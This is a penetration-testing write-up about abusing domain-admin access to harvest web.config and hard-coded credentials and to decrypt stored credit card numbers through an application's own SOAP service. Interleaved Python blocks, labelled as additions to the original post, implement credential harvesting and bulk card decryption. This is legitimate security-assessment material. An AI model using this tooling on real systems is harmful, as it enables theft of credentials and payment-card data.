Active Directory Attack Scenarios Part 2: Going Beyond Domain Admin

In this series focusing on Active Directory attacks, we’re running through four different scenarios based on real penetration testing engagements that demonstrate the variety of techniques and tactics that can be used to compromise Active Directory. In part one, we explored how attackers can take advantage of ignored assets like network-connected printers and use them as attack vectors, eventually gaining domain administrator privileges. In this second scenario, we’ll explore how to use domain admin control as a means to reach an organization’s most valuable assets.

Assumed Breach: Beginning with Elevated Privileges

Penetration testing engagements are not always about what it takes to gain access to an IT environment from an external starting point. Much of the time, testers demonstrate what an attacker would do once inside: how they pivot between systems and escalate privileges. In this case, we began with domain administrator privileges, with the goal of assessing the security of the PCI network, which consists of the systems that make up, or can affect the security of, the cardholder data environment (CDE) of any organization that handles credit card payments.

Deploying Agents to Gain Insights

We started by deploying a Cobalt Strike agent—a C2 implant—on one of the servers in order to inspect its inner workings. With this visibility, we explored the server’s network interactions and observed several connections to an Oracle database, which could potentially house payment-related information. After inspecting the logs of a web application running on the server, we found indicators that credit cards were likely being handled or processed by this application.

[Image: Deploying agents to gain insights]

Uncovering Sensitive Information

With this evidence in hand, we next retrieved the web config file, from which we pulled the database credentials. Using these credentials, we accessed the database to see if our theory was correct. Just as we suspected, it was storing credit card numbers for different users. However, they were encrypted, so more work would need to be done before someone could extract and use these numbers.
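The web config step above is worth showing concretely, because it is also where the defensive check lives. The following is an added example, not code from the original post or from the application it describes: it parses an ASP.NET web.config (a constructed sample; host, user, password and service URL are invented), pulls the database credentials out of `connectionStrings`, picks out appSettings that point at other services, and reports a section that has been encrypted with `aspnet_regiis -pe` as protected instead of silently returning nothing. A protected section is opaque without the server’s DPAPI or RSA key container, which is exactly why a copied config file alone should not be enough.

```python
# Added example (not from the original post): harvest credentials from an ASP.NET
# web.config the way a tester with admin on the web server would, and distinguish
# clear-text connection strings from sections protected by the configuration
# encryption providers. Both config documents below are constructed for the example.
import re
import xml.etree.ElementTree as ET

SAMPLE_WEB_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings>
    <add name="PaymentDb"
         connectionString="Data Source=orcl-pay01:1521/PAYPDB;User Id=payapp;Password=Summer2019!"
         providerName="Oracle.ManagedDataAccess.Client" />
  </connectionStrings>
  <appSettings>
    <add key="CryptoServiceUrl" value="http://crypto-svc.corp.local/EncodeDecode.asmx" />
    <add key="LogLevel" value="Info" />
  </appSettings>
</configuration>
"""

# The same section after `aspnet_regiis -pe connectionStrings`: nothing usable without
# the machine's key container, so the tester has to run on the box rather than copy the file.
SAMPLE_PROTECTED_CONFIG = """<?xml version="1.0"?>
<configuration>
  <connectionStrings configProtectionProvider="DataProtectionConfigurationProvider">
    <EncryptedData Type="http://www.w3.org/2001/04/xmlenc#Element"
                   xmlns="http://www.w3.org/2001/04/xmlenc#">
      <CipherData><CipherValue>AQAAANCMnd8BFdERjHoAwE...</CipherValue></CipherData>
    </EncryptedData>
  </connectionStrings>
</configuration>
"""

def parse_connection_string(cs):
    """Split 'Key=Value;Key=Value' into a dict keyed by lower-cased, trimmed key names."""
    fields = {}
    for part in cs.split(";"):
        if "=" in part:
            key, value = part.split("=", 1)
            fields[key.strip().lower()] = value.strip()
    return fields

def extract_db_credentials(config_xml):
    """One finding per <connectionStrings><add>; a protected section yields a single
    finding marked protected=True instead of being skipped."""
    root = ET.fromstring(config_xml)
    findings = []
    for section in root.iter("connectionStrings"):
        provider = section.get("configProtectionProvider")
        if provider:
            findings.append({"name": None, "protected": True, "provider": provider})
            continue
        for add in section.findall("add"):
            fields = parse_connection_string(add.get("connectionString", ""))
            findings.append({
                "name": add.get("name"),
                "protected": False,
                "host": fields.get("data source") or fields.get("server"),
                "user": fields.get("user id") or fields.get("uid"),
                "password": fields.get("password") or fields.get("pwd"),
            })
    return findings

def extract_app_settings(config_xml, pattern=r"url|endpoint|service|secret|pass|key"):
    """appSettings whose key name suggests a downstream service or a secret."""
    root = ET.fromstring(config_xml)
    rx = re.compile(pattern, re.I)
    hits = {}
    for section in root.iter("appSettings"):
        for add in section.findall("add"):
            if rx.search(add.get("key", "")):
                hits[add.get("key")] = add.get("value")
    return hits

if __name__ == "__main__":
    for finding in extract_db_credentials(SAMPLE_WEB_CONFIG):
        print(finding)
    print(extract_app_settings(SAMPLE_WEB_CONFIG))
    print(extract_db_credentials(SAMPLE_PROTECTED_CONFIG))
```

The `CryptoServiceUrl` setting is the kind of breadcrumb that makes the decompilation step that follows worthwhile: it tells you which DLL to open first.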

[Image: Uncovering sensitive information]

Commandeering Built-In Decryption

Consequently, our next step was to explore the possibility of deciphering these numbers. We dug deeper to see if decryption capabilities were available in the payment application we had looked at earlier. It turned out that the application wasn’t obfuscated in any way, so it was fairly easy to decompile its service DLLs with dnSpy. We found an interesting class called PaymentWrapper that implemented a method called SaveCardInfo. This method called another method, EncodeDecodeString, which was used to encode and decode information going to and from the database. Some of the information it needed was hard-coded in the source, exposing private data. For example, we were able to pull the credentials for the SOAP service that the app was using for encryption and decryption.
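Once a DLL is open in dnSpy, the fastest way to find what the post describes is to sweep the exported source for string literals assigned to suspiciously named fields. The following is an added example, not code from the post or the application: a small scanner run over a constructed C# fragment (class and member names are illustrative and the values are invented) that flags string assignments whose identifier looks like a credential or endpoint, whose value is a URL, or whose value embeds a connection-string password. It handles both regular and `@"verbatim"` C# strings and reports the line number so the finding can be jumped to in the decompiler.

```python
# Added example (not from the original post): triage decompiled C# for hard-coded
# credentials and service endpoints. DECOMPILED_SOURCE is constructed to resemble a
# dnSpy export of a class like the one described; it is not the real application.
import re

DECOMPILED_SOURCE = '''
public class PaymentWrapper
{
    private const string SoapEndpoint = "http://crypto-svc.corp.local/EncodeDecode.asmx";
    private const string SoapUser = "svc_crypto";
    private const string SoapPassword = "Cr7pt0-S3rv!ce";
    private const string Greeting = "Thank you for your payment";
    private static readonly int RetryCount = 3;

    public void SaveCardInfo(string cardNumber, int customerId)
    {
        string encoded = this.EncodeDecodeString(cardNumber, true);
        this.repository.Insert(customerId, encoded, cardNumber.Substring(cardNumber.Length - 4));
    }
}
'''

# identifier = "literal";   handles "..." with escapes and @"..." with doubled quotes
ASSIGN_RX = re.compile(
    r'\b(?P<name>[A-Za-z_]\w*)\s*=\s*'
    r'(?P<value>"(?:[^"\\]|\\.)*"|@"(?:[^"]|"")*")\s*;')
SENSITIVE_NAME_RX = re.compile(
    r'pass|pwd|secret|token|apikey|api_key|user|login|endpoint|url|uri|conn', re.I)
URL_RX = re.compile(r'^https?://', re.I)
CONNSTR_RX = re.compile(r'(password|pwd|user id|uid)\s*=', re.I)

def _unquote(literal):
    """Turn a C# string literal back into its value (verbatim strings use "" for a quote)."""
    if literal.startswith('@"'):
        return literal[2:-1].replace('""', '"')
    return literal[1:-1]

def find_hardcoded_secrets(source):
    """Return [{line, name, value, reasons}] for every string assignment worth a look."""
    findings = []
    for m in ASSIGN_RX.finditer(source):
        name, value = m.group("name"), _unquote(m.group("value"))
        reasons = []
        if SENSITIVE_NAME_RX.search(name):
            reasons.append("sensitive identifier")
        if URL_RX.match(value):
            reasons.append("service URL")
        if CONNSTR_RX.search(value):
            reasons.append("embedded credential in connection string")
        if reasons:
            line = source.count("\n", 0, m.start()) + 1
            findings.append({"line": line, "name": name, "value": value, "reasons": reasons})
    return findings

if __name__ == "__main__":
    for f in find_hardcoded_secrets(DECOMPILED_SOURCE):
        print(f"line {f['line']}: {f['name']} = {f['value']!r}  ({', '.join(f['reasons'])})")
```

The identifier heuristic is deliberately loose; the point is to get a short list to read, not a verdict. The `Greeting` constant is skipped because neither its name nor its value matches anything, while `RetryCount` never matches because it is not a string assignment at all.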

[Image: EncodeDecode method]
[Image: Built-in decryption]

At this point, we had gathered a great deal of information from the web config file, the decompiled DLL, and the database itself. We had the username, password, SOAP API endpoint, database name, and more. Combining all of this information would allow us to recreate and complete the EncodeDecode method call ourselves, enabling us to extract decrypted credit card numbers.

Validating the Process

When we initially pulled the user information, including the encrypted credit card numbers, there was a column that listed the last four digits of each card. These are often stored separately and left unencrypted so that an application can show a user which saved payment method they are selecting: the user confirms the card by its last four digits. For example:

[Image: Validating the process]

We were also able to use these four digits to validate whether our decryption had been successful. After extracting the decrypted numbers, we compared the last four digits of each against the stored value to ensure they matched.
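Putting the two preceding steps together, recreating the EncodeDecode call with the harvested credentials and checking each result against the clear-text last-four column, looks like the following. This is an added example, not the post’s or the application’s code: the SOAP operation name, parameter names, namespace and endpoint are assumptions (a typical ASP.NET `.asmx` layout), the credentials and ciphertext blobs are invented, and the service responses are constructed so the example runs offline, with the public card-network test numbers standing in for real PANs. The validation goes one step beyond the post by also applying the Luhn check, which rejects decryption garbage that happens to end in the right four digits.

```python
# Added example (not from the original post): rebuild the application's decode call as a
# raw SOAP 1.1 request and validate every result against the stored last four digits plus
# Luhn. Operation, parameters, namespace, endpoint and responses are assumed/constructed.
import urllib.request
import xml.etree.ElementTree as ET
from xml.sax.saxutils import escape

SOAP_ENV = "http://schemas.xmlsoap.org/soap/envelope/"
SOAP_NS = "http://tempuri.org/"          # assumed: ASP.NET's default namespace for .asmx services
SOAP_ENDPOINT = "http://crypto-svc.corp.local/EncodeDecode.asmx"   # assumed, not the real host

def build_decode_envelope(user, password, ciphertext, decode=True):
    """Request for an assumed EncodeDecodeString(username, password, data, decode) operation."""
    return (
        '<?xml version="1.0" encoding="utf-8"?>'
        f'<soap:Envelope xmlns:soap="{SOAP_ENV}"><soap:Body>'
        f'<EncodeDecodeString xmlns="{SOAP_NS}">'
        f'<username>{escape(user)}</username><password>{escape(password)}</password>'
        f'<data>{escape(ciphertext)}</data><decode>{"true" if decode else "false"}</decode>'
        '</EncodeDecodeString></soap:Body></soap:Envelope>'
    )

def http_send(envelope):
    """Real transport: POST the envelope as the .NET proxy would (not called in the demo below)."""
    req = urllib.request.Request(
        SOAP_ENDPOINT, data=envelope.encode("utf-8"),
        headers={"Content-Type": "text/xml; charset=utf-8",
                 "SOAPAction": f'"{SOAP_NS}EncodeDecodeString"'})
    with urllib.request.urlopen(req, timeout=30) as resp:
        return resp.read().decode("utf-8")

def parse_decode_response(xml_text):
    """Extract EncodeDecodeStringResult; a SOAP Fault (bad credentials, bad input) raises."""
    root = ET.fromstring(xml_text)
    fault = root.find(f".//{{{SOAP_ENV}}}Fault")
    if fault is not None:
        raise RuntimeError("SOAP fault: " + (fault.findtext("faultstring") or "unknown"))
    result = root.find(f".//{{{SOAP_NS}}}EncodeDecodeStringResult")
    if result is None or not result.text:
        raise ValueError("response carries no EncodeDecodeStringResult")
    return result.text.strip()

def luhn_ok(pan):
    """Luhn mod-10: every issued PAN passes, so random decryption output almost never does."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0

def validate_pan(candidate, stored_last4):
    """Digit-only, PAN-length, ends in the stored clear-text last four, and passes Luhn."""
    return (candidate.isdigit() and 12 <= len(candidate) <= 19
            and candidate[-4:] == stored_last4 and luhn_ok(candidate))

def decrypt_rows(rows, send, user, password):
    """rows: (row_id, ciphertext, last4) tuples; send: envelope -> response XML.
    Returns ({row_id: pan} for validated rows, [row_id, ...] for rows that failed)."""
    ok, rejected = {}, []
    for row_id, ciphertext, last4 in rows:
        pan = parse_decode_response(send(build_decode_envelope(user, password, ciphertext)))
        if validate_pan(pan, last4):
            ok[row_id] = pan
        else:
            rejected.append(row_id)
    return ok, rejected

# --- constructed stand-in for the service so the example runs offline ---------------------
def _response(result):
    return (f'<soap:Envelope xmlns:soap="{SOAP_ENV}"><soap:Body>'
            f'<EncodeDecodeStringResponse xmlns="{SOAP_NS}">'
            f'<EncodeDecodeStringResult>{result}</EncodeDecodeStringResult>'
            '</EncodeDecodeStringResponse></soap:Body></soap:Envelope>')

FAKE_SERVICE = {                               # ciphertext -> response; public test PANs
    "blob-A": _response("4111111111111111"),
    "blob-B": _response("378282246310005"),
    "blob-C": _response("4111111111111112"),   # corrupted result: last four will not match
}
SAMPLE_ROWS = [(1, "blob-A", "1111"), (2, "blob-B", "0005"), (3, "blob-C", "1111")]

def fake_send(envelope):
    """Reads <data> back out of the request, as a real endpoint would, and answers from the table."""
    data = ET.fromstring(envelope).find(f".//{{{SOAP_NS}}}data").text
    return FAKE_SERVICE[data]

if __name__ == "__main__":
    good, bad = decrypt_rows(SAMPLE_ROWS, fake_send, "svc_crypto", "not-the-real-password")
    for row_id, pan in good.items():
        print(f"row {row_id}: ****{pan[-4:]} validated")   # never log full PANs
    print("rejected rows:", bad)
```

To run it against a live service, pass `http_send` instead of `fake_send`. Only masked values are ever printed: on an engagement, the count of validated rows is the finding, and full PANs should not land in tester notes or tool output.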

Conclusions: Going Beyond Compliance

While many attack scenarios focus on taking over Active Directory, it is also important to run engagements that demonstrate what could happen after domain admin control is achieved. In this case, it served as a means of reaching the company’s most valuable assets. Ultimately, we found and compromised more than 26,000 credit card numbers being stored in the database.

This case also highlights the importance of both maintaining and surpassing compliance regulations. While PCI DSS explicitly requires internal penetration testing, many other regulations have more vague language around what type of assessments are needed. While it’s important to protect your perimeter as much as possible, no environment is impenetrable. Attention must also be paid to internal security controls that can help limit the damage of a threat actor who has breached the gates. By finding potential pivot points and privilege escalation opportunities, internal testing efforts are the safest way to find out just how severe the impact of such an attack may be.

Meet the Author

Fernando Diaz

Senior Security Consultant
Core Security, by Fortra